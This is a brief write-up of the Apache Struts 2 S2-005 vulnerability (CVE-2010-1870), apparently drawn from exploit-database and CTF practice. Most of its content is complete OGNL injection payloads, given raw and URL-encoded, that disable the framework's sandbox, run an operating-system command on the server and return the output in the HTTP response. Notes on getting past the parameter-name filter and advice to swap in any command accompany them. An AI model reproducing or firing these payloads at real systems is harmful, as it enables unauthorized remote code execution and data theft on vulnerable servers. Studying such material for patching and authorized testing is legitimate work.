CVE-2010-1870
https://nvd.nist.gov/vuln/detail/CVE-2010-1870
https://www.exploit-db.com/exploits/14360
https://cwiki.apache.org/confluence/display/WW/S2-005
S2-005 (Apache Struts 2 security bulletin; affected versions per the linked advisory: Struts 2.0.0 – 2.1.8.1, fixed in 2.2.1)
Demonstration
1. Verification — the whole query string below is sent as the request's parameter names, not values: each `(x)(('…')(d))` parameter name is evaluated as an OGNL expression. The `\43`, `\75` and `\40` sequences are OGNL octal escapes for `#`, `=` and space, used to get past the parameter-name character whitelist that rejected `#` after S2-003. The first three parameters disable the OGNL sandbox (`allowStaticMethodAccess=true`, `denyMethodExecution=false`, `excludeProperties` cleared); the remaining ones run a harmless `pwd` and write its output into the HTTP response, which is enough to confirm the target evaluates attacker-supplied OGNL.
1('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'pwd\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))
After URL encoding (the raw form above must be percent-encoded before sending: `\` → `%5C`, `[` → `%5B`, `]` → `%5D`; the line originally shown here was an unencoded duplicate of the payload above, corrected below):
1('%5C43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('%5C43context%5B%5C'xwork.MethodAccessor.denyMethodExecution%5C'%5D%5C75false')(b))&('%5C43c')(('%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET')(c))&(g)(('%5C43mycmd%5C75%5C'pwd%5C'')(d))&(h)(('%5C43myret%5C75@java.lang.Runtime@getRuntime().exec(%5C43mycmd)')(d))&(i)(('%5C43mydat%5C75new%5C40java.io.DataInputStream(%5C43myret.getInputStream())')(d))&(j)(('%5C43myres%5C75new%5C40byte%5B51020%5D')(d))&(k)(('%5C43mydat.readFully(%5C43myres)')(d))&(l)(('%5C43mystr%5C75new%5C40java.lang.String(%5C43myres)')(d))&(m)(('%5C43myout%5C75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('%5C43myout.getWriter().println(%5C43mystr)')(d))
2. Exploitation — the same chain, URL-encoded, with the command changed to `cat /flag` (a CTF-style target; substitute the command for your engagement). Caveats for practitioners: the sub-expressions rely on the container handing the parameters over in the order b, c, g, h, … n, so keep the letter ordering; `readFully` into the fixed 51020-byte buffer presumably raises EOFException when the command output is shorter, with the later parameters still printing whatever was read (padded with NUL bytes) — confirm against the target before relying on it. Only use against systems you are authorized to test.
1('%5C43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('%5C43context%5B%5C'xwork.MethodAccessor.denyMethodExecution%5C'%5D%5C75false')(b))&('%5C43c')(('%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET')(c))&(g)(('%5C43mycmd%5C75%5C'cat%20/flag%5C'')(d))&(h)(('%5C43myret%5C75@java.lang.Runtime@getRuntime().exec(%5C43mycmd)')(d))&(i)(('%5C43mydat%5C75new%5C40java.io.DataInputStream(%5C43myret.getInputStream())')(d))&(j)(('%5C43myres%5C75new%5C40byte%5B51020%5D')(d))&(k)(('%5C43mydat.readFully(%5C43myres)')(d))&(l)(('%5C43mystr%5C75new%5C40java.lang.String(%5C43myres)')(d))&(m)(('%5C43myout%5C75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('%5C43myout.getWriter().println(%5C43mystr)')(d))